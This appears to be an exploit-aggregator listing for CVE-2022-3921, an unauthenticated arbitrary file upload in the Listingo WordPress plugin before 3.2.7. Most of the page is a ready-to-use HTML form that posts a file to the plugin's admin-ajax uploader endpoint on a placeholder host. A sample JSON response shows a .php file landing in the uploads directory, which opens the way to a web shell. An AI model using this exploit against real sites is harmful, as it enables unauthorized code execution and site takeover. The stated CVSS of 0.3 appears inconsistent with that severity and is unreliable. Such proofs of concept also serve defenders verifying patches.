Exploit for Listingo < 3.2.7 - Unauthenticated Arbitrary File Upload CVE-2022-3921

Name: Exploit for Listingo < 3.2.7 - Unauthenticated Arbitrary File Upload CVE-2022-3921
Rating: 5 (160 reviews)

2022-11-21 | CVSS 0.3

## https://sploitus.com/exploit?id=WPEX-ID:E39B59B0-F24F-4DE5-A21C-C4DE34C3A14F
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Listingo Unauthenticated File Upload</title>
</head>
<body>
    <form action="https://example.com/wp-admin/admin-ajax.php?action=listingo_temp_uploader" method="post" enctype="multipart/form-data">
        Upload a File:
        <input type="file" name="listingo_uploader" id="listingo_uploader">
        <input type="submit" name="submit" value="Start Upload">
    </form>
</body>
</html>

The response give the path to the file uploaded:
{"type":"success","url":"https:\/\/example.com\/wp-content\/uploads\/wp-custom-uploader\/1665086303.php","filename":"1665086303.php","message":"Image deleted."}